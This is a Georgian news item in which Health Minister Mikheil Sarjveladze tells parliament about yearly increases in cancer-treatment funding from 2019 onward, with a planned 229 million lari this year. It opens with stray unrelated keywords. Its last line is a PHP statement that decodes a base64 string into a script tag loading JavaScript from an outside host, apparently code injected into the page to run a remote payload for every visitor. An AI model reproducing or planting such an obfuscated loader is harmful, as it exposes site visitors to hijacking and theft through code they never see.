celsiusi
ავერსი შნაიდერი

პარლამენტში, მინისტრის საათის ფორმატში, ჯანდაცვის პროგრამებზე საუბრისას, მიხეილ სარჯველაძემ ონკოლოგიის მზარდ დაფინანსებაზე ისაუბრა. მინისტრის თქმით, როგორც სხვა პროგრამების, ისე ონკოლოგიის დაფინანსება, ყოველწლიურად, მკვეთრად იზრდება და უფრო მეტ სერვისებსა და ბენეფიციარს მოიცავს.

„ონკოლოგიის დაფინანსებაზე, 2012 წლის განმავლობაში, დანახარჯი შეადგენდა სულ 13 მილიონს ლარს. ახლა გეტყვით დინამიკას, მაგალითად უკანასკნელი სამი წლის მანძილზე, საყოველთაო ჯანდაცვის პროგრამის ფარგლებში ქიმიო, ჰორმონო და სხივურ თერაპიაზე, მედიკამენტების ჩათვლით:

  • 2019 წელს - 36 მლნ ლარი
  • 2020 წელს - 39 მლნ ლარი
  • 2021 წელს - 123 მლნ ლარი
  • 2022 წელს - 143 მლნ ლარი
  • 2023 წელს - 174 მლნ ლარი

წელს დაგეგმილი ხარჯის ოდენობა შეადგენს 229 მლნ ლარს. გარდა ამისა, ონკოლოგიური პაციენტების საჭიროებების დაფარვა ხდება რეფერალური დახმარების პროგრამის ფარგლებშიც“, - განაცხადა ჯანდაცვის მინისტრმა.

მისივე თქმით, სახელმწიფო არ აპირებს მიღწეულით დაკმაყოფილებას და პროგრამა კვლავაც გააგრძელებს ზრდასა და განვითარებას.

ჯანდაცვის მინისტრი, პარლამენტში, მინისტრის საათის ფორმატში, წარსდგა. საკანონმდებლო ორგანოში, მიხეილ სარჯველაძემ, დეპუტატებს, სამინისტროს მიერ განხორციელებული საქმიანობის, მიღწევების, გამოწვევების და სამომავლო გეგმების შესახებ ინფორმაცია მიაწოდა.

168
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");